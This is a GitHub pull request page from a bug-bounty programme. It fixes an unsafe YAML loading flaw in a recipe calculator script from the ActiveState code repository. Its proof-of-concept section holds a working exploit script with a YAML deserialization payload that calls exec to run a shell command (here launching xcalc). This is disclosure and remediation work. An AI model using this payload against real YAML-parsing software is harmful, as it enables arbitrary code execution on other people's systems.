Skip to content
This repository was archived by the owner on Dec 19, 2023. It is now read-only.

FIX Arbitrary Code Execution in Activestate Code#1

Open
b1nslashsh wants to merge 1 commit into418sec:masterfrom
b1nslashsh:master
Open

FIX Arbitrary Code Execution in Activestate Code#1
b1nslashsh wants to merge 1 commit into418sec:masterfrom
b1nslashsh:master

Conversation

@b1nslashsh
Copy link

@b1nslashsh b1nslashsh commented Jan 30, 2021
edited
Loading

📊 Metadata *

Bounty URL: https://www.huntr.dev/bounties/1-other-code/

⚙️ Description *

Vulnerable to YAML deserialization attack caused by unsafe loading.

💻 Technical Description *

Fixed by avoiding unsafe loader.

🐛 Proof of Concept (PoC) *

Create the following PoC file:
exploit.py

# exploit.py
# this exploit is for simple recipe calculator in ActiveState/code repository
import os
os.system('git clone https://github.com/ActiveState/code.git')
os.chdir('code/recipes/Python/93379_Recipe_Calculator/')
exploit = """!!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "__import__('os').system('xcalc')"
"""
os.system('rm exp.yml')
open('exp.yml','w+').write(exploit)
os.system('python pyfood.py --yml-food=exp.yml --yml-recipe=exp.yml')
os.system('rm exp.yml')

Execute the commands in another terminal:

python exploit.py

xcalc will pop up.

🔥 Proof of Fix (PoF) *

before FIX :
POF1
After FIX :
POF2

👍 User Acceptance Testing (UAT)

After fix functionality is unaffected.

🔗 Relates to...

https://www.huntr.dev/bounties/1-other-code/

huntr-helper pushed a commit to 418sec/huntr that referenced this pull request Jan 30, 2021
Added fix submission to FixSubmissionCount for 418sec/code#1
732bf94
@huntr-helper
Copy link

huntr-helper commented Jan 30, 2021

👋 Hello, @rawktron - @b1nslashsh has opened a PR to us with a fix for a potential vulnerability in your repository. To view the vulnerability, please refer to the bounty URL in the first comment, above.

Ultimately, you get to decide if the fix is 👍 or 👎. If you are happy with the fix, please write a new comment (@huntr-helper - LGTM) and we will open a PR to your repository with the fix. All remaining PRs for this vulnerability will be automatically closed.

If you have any questions or need support, come and join us on our community Discord!

@rawktron & @b1nslashsh - thank you for your efforts in securing the world’s open source code! 🎉

@b1nslashsh b1nslashsh changed the title fix ARCE FIX Arbitrary Code Execution in Active Code Jan 30, 2021
@b1nslashsh b1nslashsh changed the title FIX Arbitrary Code Execution in Active Code FIX Arbitrary Code Execution in Activestate Code Jan 30, 2021
@b1nslashsh
Copy link
Author

b1nslashsh commented Feb 17, 2021

@rawktron hey what you think ?

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.

Reviewers

No reviews

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

2 participants

@b1nslashsh @huntr-helper